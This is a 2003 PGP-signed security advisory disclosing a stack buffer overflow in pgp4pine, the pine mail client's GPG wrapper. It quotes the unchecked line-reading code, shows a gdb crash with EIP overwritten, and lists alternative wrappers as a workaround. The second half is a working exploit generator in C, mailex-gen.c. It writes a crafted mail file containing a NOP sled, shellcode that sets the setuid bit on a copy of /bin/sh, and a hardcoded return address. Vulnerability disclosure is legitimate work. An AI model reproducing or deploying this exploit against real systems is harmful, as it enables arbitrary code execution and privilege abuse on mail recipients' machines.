-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Following informations:
I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
to gpg for pine, it is called from pine to parse mail body and get PGP
information from the file.
more information : http://pgp4pine.flatline.de/
II Problem description:
When installed/configured within pine, pgp4pine parse any incoming mail
before reading (in the default standard configuration) looking for
PGP tokens & informations to do his sender's signature verifications.
To verify incoming mail it calls :
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and read each line according to this loop :
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
fertig=0;
while (!fertig)
{
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
else if ((readline[i++]=c) == '\n')
{
readline[i]='\0';
fertig=1;
}
}
fertig=0;
if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
{
/* got signed message */
fclose(fin);
while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
fertig=1;
}
else if (strncmp("-----BEGIN PGP",readline,14)==0)
{
/* got another type of PGP message (encrypted, keys ...) */
fclose(fin);
fileDecrypt(inFile,outFile);
waitForReturn();
fertig=1;
}
else
i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
If a single line go over 256 chars directly to EOF,
it will overwrite saved environnement on the stack and return,
since there is no check on the index 'i' within the readline[] array,
[...]
}
else if ((readline[i++]=c) == '\n')
{
[...]
you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary
saved registers before hiting one condition to return.
[...]
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
[...]
then try:
[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Here it is ;)
III Impact
Since pgp4pine process any incoming email, sending special crafted email
can make sender execute arbitrary code on the recipient box when the
mail is opened.
IV Workaround/Solutions
Deactivate pgp4pine and use another pgp wrapper for pine :
http://pgpenvelope.sourceforge.net/
http://www.megaloman.com/~hany/software/pinepgp/stable.html
or any other...
author [EMAIL PROTECTED] has been contacted since 01/2003
no reply since :/
V Proof of concept
Attached proof of concept code, for any informations read the source.
Best Regards,
- ---
Eric AUGE.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK
3aY03iuZQPfonSiyaqa5/Co=
=zirR
-----END PGP SIGNATURE-----
/*
* mailex-gen.c -- PGP4Pine exploit mail generator - proof of concept
* Copyright (C) 2003 - Eric AUGE
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2 of
* the License or (at your option) any later version.
*
* This program is distributed in the hope that it will be
* useful, but WITHOUT ANY WARRANTY; without even the implied
* warranty
* of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
* 02111-1307
* USA
*
* how poc code works :
* $ cp /bin/sh /tmp/sh
* $ ls -l /tmp/sh
* -rwxr-x--- 1 rival users 680304 Mar 12 15:17 /tmp/sh
* $ ./mailex-gen
* eip (i use readline[] addr): 0xbfffdbd0
* now type: /path/to/pgp4pine-vuln -d -i ./mailme
* $ /path/to/pgp4pine-vuln -d -i ./mailme
* $ ls -l /tmp/sh
* -rwsr-xr-x 1 rival users 680304 Mar 12 15:17 /tmp/sh
*
*
* Eric AUGE <[EMAIL PROTECTED]>
*
*/
/*
* NOTE: EIP is hardcoded regarding my own system and tests,
* tune it for your needs ;)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define MAXLINESIZE 301
#define SAVED_EIP 0xbfffdbd0
#define NOP 0x90
#define ALIGN 0
#define XFILE "mailme"
/* quick made chown 4755 /tmp/sh */
unsigned char shellcode[] =
"\xeb\x14\x31\xc0\x34\x0f\x5b\x31\xc9\x66\xb9\xed\x09\xcd\x80"
"\x31\xc0\x40\x89\xc3\xcd\x80\xe8\xe7\xff\xff\xff/tmp/sh";
int main(int argc, char **argv) {
int i,_sc_size,fd;
unsigned char buffer[MAXLINESIZE] = "\0";
long *ptr;
char *cptr;
_sc_size = sizeof(shellcode);
ptr = (long *) &buffer;
fprintf(stderr,"eip (i use readline[] addr): %p\n", SAVED_EIP);
for (i = 0; i < MAXLINESIZE ; i += 4) {
*ptr++ = SAVED_EIP;
}
cptr = (char *) &buffer;
cptr = cptr + MAXLINESIZE - 45 - _sc_size;
for ( i = 0; i < _sc_size ; i++ )
*cptr++ = shellcode[i];
for ( cptr = (char *) &buffer ; cptr < ((char *)buffer + MAXLINESIZE - 45 -
_sc_size) ; cptr++)
*cptr = NOP;
/* now lets create the file */
if ( (fd = open(XFILE, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU|S_IRGRP|S_IROTH)) == -1) {
fprintf (stderr,"open() failed!\n");
exit(1);
}
write(fd,&buffer,sizeof(buffer));
close(fd);
fprintf(stderr,"now type: /path/to/pgp4pine-vuln -d -i ./mailme\n");
return (0);
}
